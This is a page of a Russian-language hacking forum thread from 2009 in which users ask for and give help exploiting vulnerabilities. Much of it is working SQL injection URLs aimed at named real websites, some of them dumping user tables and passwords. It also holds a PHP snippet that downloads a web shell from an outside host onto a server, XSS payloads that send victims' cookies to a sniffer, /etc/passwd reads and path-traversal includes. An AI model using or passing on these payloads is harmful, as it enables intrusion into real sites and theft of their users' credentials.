PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

mailbrush
03.03.2009, 20:41
Assembler, тебе сюда! http://forum.antichat.ru/forum76.html

j0ker13
03.03.2009, 20:43
еще один вопрос)
конструкция select+1+top+login+from+user+where+id=1 не выводит ошибки)
как я понимаю просто такого ид не существует?
select+top+1+start+at+2+login+from+user ругается на Incorrect syntax near '2'.

где то был топик на эту тему но ответа так и не увидел.
какие еще есть варианты вывести другие записи?)

diznt
03.03.2009, 20:47
mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)

Нужен скриптик на пхп
Чтобы когда зашол на эту пхп страницу(скрипт) то заметно заливался шелл на сайт
путь до сайта знаю(если понадобиться)

up. чуть подкоректировал чтобы было легче понимать :)

mailbrush
03.03.2009, 20:52
Ух блин... Это скуля? Какие колонки выводятся?

AkyHa_MaTaTa
03.03.2009, 20:53
mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)



up. чуть подкоректировал чтобы было легче понимать :)
Насколько я понял тебя:
if($_GET['get_shell']=='yes')
copy('http://malicos.ru/shell.txt','/путь/имя_шелла');
/*
file_put_contents( '/путь/имя_шелла',file_get_contents('http://malicos.ru/shell.txt'));
и т.п. и т.п.

*/

mozarat
03.03.2009, 21:32
Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?

попугай
03.03.2009, 23:16
Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?

Плагин к фалерфоксу, - LiveHTTP Headers

VIP
03.03.2009, 23:37
Можно сформировать просто страничку которая будет передовать пораметры голосования POST или GET, ты можешь это посмотреть на форме голосования какая переменная передаются какому скрипту и каким методом, а потом на сформированую страничку просто лей трафик и всё...

вот именно как узнать каким методом передаётся ответ на голосование и какая переменная соответствует тому или иному варианту я не знаю

DimOnOID
04.03.2009, 09:03
вот именно как узнать каким методом передаётся ответ на голосование и какая переменная соответствует тому или иному варианту я не знаю ну это можно посмотреть глянув в "html код" страницы...
Ну или
скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....

user777
04.03.2009, 12:20
Перекопал много ресурсов но так никто и не ответил.
Как можно "слить" базу данных из локальной сети? Сервер базы крутится на Оракле.
Имеется связка логин\пасс для программ работающих с базой.
Как? Чем? Что еще нужно?

AkyHa_MaTaTa
04.03.2009, 12:32
И так имееться сайт
URL сайта примерно такой:

http://nash-sait.ru/photo.php?image=http://nash-sait.ru/img/img001.jpg

Инклуд возможен но открываеться инклуд как картинка (то есть в конце дописываеться .jpg)
можно ли запрос image послать на мою картинку, причем в моей картинке есть шелл (то есть открываешь картинку команда в системе выполняеться)
так вот такой вопрос настиг
где будет выполняться сам код картинки? на моем хосте или на том где открылась картинка?
ММ, сомневаусь что это инклюд, так как файл с изображением не должен подключаться к php коду(не ну возможно и такое).Скорее всего там идет либо копирование этого файла на хост, либо он просто читаеться, а потом передаеться функции для работы с изображением.

Imperou$
04.03.2009, 17:34
Есть скуль, на любой запрос реагирует

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Пробывал и /**/ и разнообразные альтернативные варианты,окончание sql запроса так же пробывал разнообразные, всё равно такой же результат.
Подзапросы так же не работают.
Например id=211+or+substring(version(),1,1)=5-- плюётся ашыбкой

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or substring(version(),1,1)=5--' at line 1

Не могу даже подобрать кол-во полей.
В чём может быть проблема и как обойти?

BlackSun
04.03.2009, 17:36
Попробуй с кавычкой - id=-1' ..., если пробовал и не помогло - облом, скули нет.

Imperou$
04.03.2009, 17:42
Видимо облом.С кавычкой то же самое...

Jokester
04.03.2009, 17:43
Imperou$ Линк давай посмотрим, что-то мне кажется, что ты просто что-то не так делаешь, а скуль всё-же есть.

Не хочешь в паблик, можешь мне в ПМ кинуть

-m0rgan-
04.03.2009, 18:12
Imperou$, а может проблемы в обозначении коментария -- ?

попробуй /* # +--+ --+ +-- и т д...

Jokester
04.03.2009, 18:23
-m0rgan- всё уже решили, там лимит.

Кстати, не пояснишь зачем вот такие комментарии?
"+--" ,"+--+"
Синтаксис мускула требует хотя-бы один пробел ПОСЛЕ -- . Всё остальное извраты :)

PaCo
05.03.2009, 12:34
Доброго всем времени суток, у меня такой вопрос:
Если какой то способ обхода слеширования кавычек или какой то способ не использовать кавычки при указания адресса записываемого файла при INTO DUMPFILE, INTO OUTFILE - %27 и указание в хексе(ну мало ли :)) адресса не проходит, возможно ли это как то обойти?

Gorev
05.03.2009, 12:47
если я тебя правильно понял, то при указывание файла в хексе то кавычки ставить не надо например load_file('/etc/passwd') = load_file(hex of /etc/passwd without '=0x2f6574632f706173737764)

PaCo
05.03.2009, 12:55
если я тебя правильно понял, то при указывание файла в хексе то кавычки ставить не надо например load_file('/etc/passwd') = load_file(hex of /etc/passwd without '=0x2f6574632f706173737764)
:) Ты меня не правильно понял, LOAD_FILE та понятно что можно прохексить(прочарить) адресс файла, а меня интересует именно INTO OUTFILE ,INTO DUMPFILE, просто есть куча сайтов где слешируються кавычки а файл привилегии есть, но кроме чтения ничего не выходит, вот и интересует можно ли как то указать адресс файла назначения не прибегая к кавычкам при записи

DimOnOID
05.03.2009, 12:55
Он хочет OUTFILE выполнить...а не LOAD_FILE.
Нет..нельзя обойти.

Iceangel_
05.03.2009, 13:20
2 PaCo
Если есть, файл прив, и ты хочешь записать шелл, то следовательно(скорее всего) у тебя есть и пути ... Читай файлы сайта, и возможно найдешь 2-ной запрос, благодаря которому, и получится залить шелл в твоих условия...
Читай вот это http://forum.antichat.ru/showpost.php?p=663815&postcount=39

PaCo
05.03.2009, 13:27
2 PaCo
Если есть, файл прив, и ты хочешь записать шелл, то следовательно(скорее всего) у тебя есть и пути ... Читай файлы сайта, и возможно найдешь 2-ной запрос, благодаря которому, и получится залить шелл в твоих условия...

:) ну это все понятно и естествено, просто хотел узнать именно по кавычкам в INTO OUT и INTO DUMP для экономии времени.

needle
05.03.2009, 17:37
http://www.vzlom-icq.ru/login.php ето что?

-m0rgan-
05.03.2009, 17:44
Это ошибка в скрипте login.php

needle
05.03.2009, 17:46
её можно использовать какимто образом?

a1ex
05.03.2009, 17:48
её можно использовать какимто образом?
нет.

-m0rgan-
05.03.2009, 17:54
>>её можно использовать какимто образом?

Это не уязвимость, разве что светит пути...

Это ошибка в коде при его написании, она не вызвана побочными факторами...

faza02
05.03.2009, 18:00
ты знаешь пути до сервера.

-m0rgan-
05.03.2009, 18:07
Ток это сложно назвать багой, так дополнение...(

diznt
05.03.2009, 19:41
если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
Или куки тыряться токо с поддомена если я зашлю челу каторый авторизован на sait.ru?

AkyHa_MaTaTa
05.03.2009, 19:45
если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
Или куки тыряться токо с поддомена если я зашлю челу каторый авторизован на sait.ru?
Нет, поддомен это уже другой сайт, куки там будут свои.
Если в куках конечно не прописываеться domain:.sait.ru

попугай
05.03.2009, 19:47
если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
Или куки тыряться токо с поддомена если я зашлю челу каторый авторизован на sait.ru?


Бывает так, что куки ставятся для всех поддоменов.

То есть так

Set-Cookie: cooka=value; host=*.domen.com


На майлру так. Поэтому куки с одного домена доступны на другом.

AkyHa_MaTaTa
05.03.2009, 19:57
Бывает так, что куки ставятся для всех поддоменов.

То есть так

Set-Cookie: cooka=value; host=*.domen.com


На майлру так. Поэтому куки с одного домена доступны на другом.
Посмотри по внимательнее header на том же mail.ru там идет
Set-Cookie: Mpopl=79670372; expires=Thu, 05 Mar 2009 16:08:57 GMT; path=/; domain=.mail.ru
насчет host=*.domen.com - не слышел не разу, может и так работает.
Я основываюсь на http://www.faqs.org/rfcs/rfc2109 и http://www.faqs.org/rfcs/rfc2965 - там нет ничего про host

zifanchuck
05.03.2009, 19:59
вот что обнаружыл(чисто случайно))))

Ошибка БД

Error Number: 1267

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation '='

SELECT * FROM (`users`) WHERE `name` = 'й' LIMIT 1

наскоко я понял там когда вводиш руские символы вылезает такая ошыбка. А можно как то раскрутить ето все дело??? я просто такое раньше никогда не видел

[Raz0r]
05.03.2009, 20:03
если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
можно
Из browser security handbook:
domain=example.com is exactly equivalent to domain=.example.com

@zifanchuck
в случае если кавычки не фильтруются

zifanchuck
05.03.2009, 20:21
@zifanchuck
в случае если кавычки не фильтруются
подставил ковычку ошыбки нету((( а жаль

попугай
05.03.2009, 21:01
Посмотри по внимательнее header на том же mail.ru там идет
Set-Cookie: Mpopl=79670372; expires=Thu, 05 Mar 2009 16:08:57 GMT; path=/; domain=.mail.ru
насчет host=*.domen.com - не слышел не разу, может и так работает.
Я основываюсь на http://www.faqs.org/rfcs/rfc2109 и http://www.faqs.org/rfcs/rfc2965 - там нет ничего про host


Да, я про это и говорил. Перепутал просто - не host, а domen, и не *.mail.ru, а просто .mail.ru.

Куки ставятся на все поддомены.

Gorev
05.03.2009, 21:10
2 zifanchuck давай урлу

F4R
05.03.2009, 22:07
Microsoft OLE DB Provider for SQL Server error '80040e21'

Unclosed quotation mark before the character string ''.

/inc/connection.asp, line 48


это бага?

если да то неполучается узнать даже версию

/details.asp?id=699882982&dme_code=1%20or%201=@@version--

в ответ получаю
Microsoft OLE DB Provider for SQL Server error '80040e21' Incorrect syntax near the keyword 'or'. /inc/connection.asp, line 48

попугай
05.03.2009, 23:06
or 1=(select @@version)

-m0rgan-
06.03.2009, 00:23
F4R, читай литературу по MSSQL!

F4R
06.03.2009, 07:45
дак я читал вчера весь день...

на
/details.asp?id=699882982&dme_code=or 1=(select @@version)

выводит

Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48

Gorev
06.03.2009, 09:52
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=li%20zdes'%20ili%20prosto?

что здесь такое?

Zitt
06.03.2009, 10:09
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=&mod=prosto

DimOnOID
06.03.2009, 10:10
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=li%20zdes'%20ili%20prosto?

что здесь такое?

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=<script>alert(/dd/)</script>
:) Не более...

Gorev
06.03.2009, 10:54
http://www.tamasitheatre.ro/ro/1.html?cikk_id=3780+union+select+null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null--


version() PostgreSQL

не могу найти вывод, или все таки слепая?

Jokester
06.03.2009, 11:30
есть скуля... вроде. но что то не так
Фильтрация union, select
Работает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*
Неработает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*union*//*

Gorev
http://www.tamasitheatre.ro/ro/1.html?cikk_id=-3780+union+select+null,null,version(),null,4,null, null,null,1,null,null,null,null,null,null,2,3--

F4R
06.03.2009, 12:13
/details.asp?id=699882982&dme_code=or 1=(select @@version)


вылезает ошибка:

Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48



кто что может сказать?

Jokester
06.03.2009, 12:28
кто что может сказать?
Я могу сказать вот что:

ОТСТАНЬ ОТ ЭТОГО САЙТА.

И лучше тебе прислушаться :)

F4R
06.03.2009, 12:30
Я могу сказать вот что:

ОТСТАНЬ ОТ ЭТОГО САЙТА.

И лучше тебе прислушаться :)
а ты знаешь что это за сайт?


мне всего лишь хочется узнать версию и всё..

Jokester
06.03.2009, 12:32
а ты знаешь что это за сайт?
http://www.google.com/search?client=opera&rls=ru&q=dme_code&sourceid=opera&ie=utf-8&oe=utf-8

F4R
06.03.2009, 12:33
фигасе
)

VIP
06.03.2009, 15:08
ну это можно посмотреть глянув в "html код" страницы...
Ну или
скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....

А аналоги под линуху есть?

oRb
06.03.2009, 15:59
А аналоги под линуху есть?
захват: wireshark, ettercap, ngrep, tcpdump
посылка: netcat, curl

[Raz0r]
06.03.2009, 17:27
А аналоги под линуху есть?
Burp Suite, WebScarab

+++AndreyDevil+++
06.03.2009, 17:46
Есть скуля======================================== ================
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1'
================================================== ==============
Слобцов 7......
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+7--
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+8--
================================================== ==============
Когда ввожу----- http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+union+select+1,2,3,4,5,6,7--
Всё равно пишит-------The used SELECT statements have a different number of columns
================================================== ==============
Что такое? Как это обойти?
================================================== ==============
P.S===== А так же http://www.higherhacknell.co.uk/recipes.php?id=-1' ! Нельзя перебрать с помощью ORDER BY(Редериктит сразу).....Что в таком случае возможно сделать?
Заранее спасибо! )) (Если где-то обсуждалось, то извините, не видел))))
================================================== ==============
================================================== ==============

-m0rgan-
06.03.2009, 17:51
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=5--

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=4--

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=3--

3-тяя ветка, в ней union select непашет!

Jokester
06.03.2009, 18:06
3-тяя ветка, в ней union select непашет!
Мде

А мне кажется пятая
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+and+substring(version(),1,1)=5--+

+++AndreyDevil+++
Там двойной запрос

а вторая отлично перебирается, просто кавычку нужно ставить
http://www.higherhacknell.co.uk/recipes.php?id=-1'+union+select+1,2,concat_ws(0x3a,User(),Database (),Version()),4,5,6,7,8,9,0,11/*

l1ght
06.03.2009, 18:47
кто что может сказать?
там процедура угадывай синтаксис
domodedovo.ru/ru/main/timetablenew/details.asp?id=731323262&dme_code=la,la

VITАL
06.03.2009, 19:34
http://listok.ura.ru/photo/index.php?id=6'
есть скуля... вроде. но что то не так
http://www.vedomosti.ru/newsline/index.shtml?2009/03/05/738007'
поможете?)

Jokester
06.03.2009, 20:17
VITАL
https://forum.antichat.ru/showpost.php?p=1152922&postcount=5810

Тебе по 2 раза нужно отвечать? :)

VITАL
06.03.2009, 20:43
jokester
спасибо) не заметил... да там вижу нифига не получится.. а второй? хз... думаю тоже не выйдет

Gorev
07.03.2009, 01:04
http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64.html

Великий Jokester помоги, вроде вывод есть а не выводит.Спасибо заранее.

Pashkela
07.03.2009, 01:21
Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку.

Пока только так вижу:

http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+and+substring(version(),1,1)=5.html

R1dex
07.03.2009, 01:25
Там рядом полноценная инъекция...

http://www.turisminromania.ro/index.php?judet=10+and+1=0+union+select+1,version( ),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49--

Gorev
07.03.2009, 01:29
thanks to R1dex , разобрался

надо спать больше, зациклился на одном и бошка дальше не думает...всем спасибо и спокойной ночи

Jokester
07.03.2009, 01:39
Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку.
Не в поле дело , а в общей длинне строки
Там рядом полноценная инъекция...

И эта ничем не хуже, просто ненужное надо убрать :)
http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~2+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4+from+information_schema.tables.html

Pashkela
07.03.2009, 01:42
гы, точняк. Просто с такого кол-ва полей неплохо экономица за счет урезания по одному символу с каждого числа. Риспект.

попугай
07.03.2009, 02:46
что тут у нас такое?

http://prescott-az.gov/news/index.php?id=1468+order+by+12/* - 12 типа..
http://prescott-az.gov/news/index.php?id=1468+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12/* а не работает...

DimOnOID
07.03.2009, 11:32
что тут у нас такое?

http://prescott-az.gov/news/index.php?id=1468+order+by+12/* - 12 типа..
http://prescott-az.gov/news/index.php?id=1468+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12/* а не работает...
Нету вывода.Юзай как слепую.
http://prescott-az.gov/news/index.php?id=1468+and+substring(version(),1,1)=4/*

Shaitan-Devil
07.03.2009, 12:40
Вывода нет. Один запрос переходит в другой.

l1ght
07.03.2009, 15:26
И эта ничем не хуже, просто ненужное надо убрать 2+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4+from+information_schema.tables.html
вот именно, мы же не для феньки разбирали это всё)
1+union+select+tables.*,tables.*,tables.*,1+from+i nformation_schema.tables.html
tables:
TABLE_CATALOG
TABLE_SCHEMA
TABLE_NAME
TABLE_TYPE
ENGINE
VERSION
ROW_FORMAT
TABLE_ROWS
AVG_ROW_LENGTH
DATA_LENGTH
MAX_DATA_LENGTH
INDEX_LENGTH
DATA_FREE
AUTO_INCREMENT
CREATE_TIME
UPDATE_TIME
CHECK_TIME
TABLE_COLLATION
CHECKSUM
CREATE_OPTIONS
TABLE_COMMENT

& columns:
TABLE_CATALOG
TABLE_SCHEMA
TABLE_NAME
COLUMN_NAME
ORDINAL_POSITION
COLUMN_DEFAULT
IS_NULLABLE
DATA_TYPE
CHARACTER_MAXIMUM_LENGTH
CHARACTER_OCTET_LENGTH
NUMERIC_PRECISION
NUMERIC_SCALE
CHARACTER_SET_NAME
COLLATION_NAME
COLUMN_TYPE
COLUMN_KEY
EXTRA
PRIVILEGES
COLUMN_COMMENT

Imperou$
07.03.2009, 16:42
Ситуация.
Получил доступ в админку, через аплоад картинок (другого нет) заливаю шелл (допустим shell.php).
Скрипт меняет название шелла и расширение, на что то типа uploadimage.gif?3451
когда обращаешься к этой картинке-в браузере показывается код шелла.Как получить нормальный шелл?
Доступ в админку получил через скулю, файл прив пашет, могу прочитать /etc/passwd и ещё несколько.Но не знаю папку с правами на запись, поэтому через скулю залить шелл не могу.
Выручайте!

Jokester
07.03.2009, 16:57
Как понять "не знаю папку на запись" ?

Лей в ту папку, куда из админки заливается твоя картинка, права должны быть

Imperou$
07.03.2009, 17:00
Я в неё и пробовал, нифига =(

Jokester
07.03.2009, 17:04
Я в неё и пробовал, нифига =(
Так что ты хочешь услышать? Если скрипт меняет расширение файла при заливке, то ничего ты тут не сделаешь. Ищи папку на запись, и лей через скуль. Или ищи инклуд, и инклудь свой шелл

blackybr
07.03.2009, 17:12
Ситуация.
Получил доступ в админку, через аплоад картинок (другого нет) заливаю шелл (допустим shell.php).
Скрипт меняет название шелла и расширение, на что то типа uploadimage.gif?3451
когда обращаешься к этой картинке-в браузере показывается код шелла.Как получить нормальный шелл?
Доступ в админку получил через скулю, файл прив пашет, могу прочитать /etc/passwd и ещё несколько.Но не знаю папку с правами на запись, поэтому через скулю залить шелл не могу.
Выручайте!

Возможно картинка хранится в базе, а не в файловом варианте. И 3451 некий айди картинки вытаскивающий и показывающий ее. Второй вариант - от картинки обрезается расширение и настоящее имя ее вроде 3451.jpg ... Ну или много еще чего. Слишком размывчато все описал.

Imperou$
07.03.2009, 17:59
Куда не пробую, не выходит...

"Can't create/write to file '/home/httpd/vhosts/site.org/httpdocs/images/c.php' (Errcode: 13)"
Искал папку tmp, чаще всего просто встречал-не нашёл.

Инклуда нет, я не нашёл.Двиг баганый, я уже заливал на многие такие же через админку, нормально аплоадило, расширение не менялось.Вот первый раз столкнулся.
Если у кого есть желание посмотреть, могу в пм скинуть данные для доступа в админку и саму скулю.

R1dex
07.03.2009, 19:01
Не хватает прав, ищи диру доступную для записи..
Можешь скинуть в личку, посмотрю, ради интереса.

Assembler
07.03.2009, 19:37
Народ подскажите какой префикс у таблиц форума http://www.stavochka.com/forum/index.php а то я ужо за''''ся =)

Jokester
07.03.2009, 19:40
http://up.cih.ms/ettee/sql/

По дефолту
phpbb_

Assembler
07.03.2009, 19:53
jokester, там не дефолт... Не канает phpbb_ Вот смотри сам..
http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%2 01,2,3,4,username,6,7,8,9,10%20%20from%20phpbb_use rs--

Есть подозрение что там ваще без префикса

http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%2 01,2,3,4,username,6,7,8,9,10%20%20from%20users--
Но тогда почему нету user_password ?? блин.

ElteRUS
07.03.2009, 20:07
http://www.new.stavochka.com/view.php?contentid=999999999999+union+select+1,2,3 ,4,concat_ws(0x2F,username,userpassword),6,7,8,9,1 0+from+users--

Смотри сурс странички авторизации

<input name=userpassword size=18 type=password>

Бывает, что совпадает с именем колумна (но не всегда конечно). А таблицы форума могут лежать в другой базе, к которой вообще может не быть доступа

Assembler
07.03.2009, 20:13
ElteRUS, спс. + воткнуть не могу седня уже исчерпал лимит!!

roddik
07.03.2009, 22:57
Привет, сорри за нубский вопрос, залил пхп шелл на один сайт и обнаружил, что кроме него там еще две сотни, файл я могу залить папку к каждому, и вот я заливаю шелл в нужную мне папку, дергаю из браузера, но пхп не интерпретируется, файлы используются cfm (получается в одной папке пхп катит, в другой - нет), я бы залил хтаксес, но там Microsoft-IIS/5.0 сервак. Как залить шелл? Спасибо

зы: нужно для общего развития)

S0ulVortex
08.03.2009, 11:30
Че-то я не пойму как раскрутить её
http://www.fontsmith.com/custom.php?id=807

mailbrush
08.03.2009, 11:50
S0ulVortex, слепая скуля.
http://www.fontsmith.com/custom.php?id=9'+union+select+1,2,3,4,5,6,7,8,9/*
проблема в том что стоит два (или четыре) подряд запроса с разным количеством полей в запросе и параметр подставляется туда и туда. Получается если заюзать количество столбиков в юнионе которое равно количеству в первом запросе, то второй выдаст ошибку, если равное количеству во втором то ошибку выдаст первый, если вообще левое, то ОБА выдадут ошибку (это и есть твои 4 ошибки).

Seshh
08.03.2009, 17:14
Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку по которой должен отклик от жертвы произойти со скоиптом ("><script>alert(document.cookie)</script>) или без ?????

faza02
08.03.2009, 17:26
http://torg.mail.ru/news/?0103/2009"><script>img = new Image(); img.src = "http://сниффер?"+document.cookie;</script>
так. статьи почитай, в них все это описано. от Micr0b'a например.

Seshh
08.03.2009, 19:16
так. статьи почитай, в них все это описано. от Micr0b'a например.

Да я уже везде полазил.
Именно этот момент не уточнён, со скриптом или без.

diznt
08.03.2009, 21:13
Народ чет не понятен вопрос шелл через картинку
вставляю в конец файла(.gif) (открытым блокнотом) к примеру

<?php
echo "zzzzz"
?>

Он у меня заливает но картинка становиться большой 8*292 x 8*292 пикселей
И не выводиться "zzzzz"
Что делать? С чем это едят?

YoriK
08.03.2009, 21:22
Задумывался над тем же вопросом. Хорошая статья разора.

http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/

diznt
08.03.2009, 21:28
YoriK мне эта статья не нужна так как там юзаеться программа спец. а мне нужно через блокнот это все

F4R
08.03.2009, 23:19
всё начиналось очень хорошо, пока дело не дошло до вывода админских логинов:паролей..
значит запрос такой:
=-24+union+select+1,concat(tp)+from+events--


и в ответ ничего кроме всяческих ошибок.. что можно сделать?

BlackSun
08.03.2009, 23:21
concat(tp) - что это? убери concat

F4R
08.03.2009, 23:23
=-1+union+select+1,tp+from+events--

тоже самое!

R1dex
08.03.2009, 23:24
Проверь, есть ли записи в таблице и в какой она бд.

Pashkela
08.03.2009, 23:24
мда, информации море:

1. Для вывода одного параметра concat нафинг не нужен (тогда уже group_concat)
2. Проверить правильность написания именя поля + имени таблицы
3. Попробуй unhex(hex(tp))
4. Ссылку в студию или в личку
5. "кроме всяческих ошибок" - текст ошибок когда в студии - 99% успешных подсказок.
6. Пустая табла - пробуй считать - -24+union+select+1,count(tp)+from+events--

по п.6 - скорее всего 0 выведет

Gorev
08.03.2009, 23:25
покажи ссылку что догадки строить, так до утра будешь искать

AFoST
08.03.2009, 23:29
=-1+union+select+1,tp+from+events--

тоже самое!
таблица events существует? поле tp существует?
попробуй для начала
-1+union+select+1,2--

F4R
08.03.2009, 23:32
да всё сушествует..
кароче ошибка:
No database selected : никакая база данных не выбранна!

Jokester
08.03.2009, 23:39
да всё сушествует..
кароче ошибка:
No database selected : никакая база данных не выбранна!
Заканчивай с гаданием. Без линка на вопрос не ответить. Я готов поспорить, что там всё элементарно, и тебе уже ответили на вопрос. Не хочешь сюда линк, кто-то там в приват просил, а гадания на 10 страниц ни к чему

https://forum.antichat.ru/thread104591.html
вопросы 2.3.4. Если после прочтения ответов на эти вопросы ничего не получится , линк или сюда или в ПМ. Я это писал для того, что-бы вопросы по кругу не ходили, но видимо бесполезно потратил время

telas
09.03.2009, 00:10
Подскажите на каком движке сайт и если можно какие дыры есть http://space.lv

VIP
09.03.2009, 11:48
Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

Где под firefox 3 в ubuntu можно найти сам этот profile.php ?

faza02
09.03.2009, 16:19
http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..

PaCo
09.03.2009, 16:19
Подскажите здесь есть вывод данных -
http://www.sklad-kadri.si/kadrovske/?k=izpis&id=5061112000123123+union+select+1,2,3,4,5,6--+ ?

R1dex
09.03.2009, 16:22
Тут:

http://www.sklad-kadri.si/kadrovske/?k=izpis&id=-5061112000123123+union+select+1,2,3,4,5,6,7,8,9,0, 11,12/*

Shaitan-Devil
09.03.2009, 21:00
Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?

AFoST
09.03.2009, 21:04
Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?
как они выглядят покажи

-m0rgan-
09.03.2009, 21:13
В basic используется Base64 шифрование.

[Raz0r]
09.03.2009, 21:18
Для передачи - шифрование base64, но в самих файлах (.htpasswd) пассы обычно зашифрованы DES'ом

roddik
09.03.2009, 21:56
http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..

http://www.zabihah.com/da.php?id=1/../../../../../index

Seshh
10.03.2009, 10:45
:confused:
Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ?????

-m0rgan-
10.03.2009, 10:48
Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...

Rubaka
10.03.2009, 10:55
если хош украсть куки тебе ишо нужен сниффер!
тута усе расписано было!

Seshh
10.03.2009, 14:42
Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...

Т.е. выглядеть будет примерно так???:

http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script>

А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;

VIP
10.03.2009, 16:02
Как быть offline vkontakte.ru
Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

Где под firefox 3 в ubuntu можно найти сам этот profile.php ?

^YaHoo^
10.03.2009, 16:48
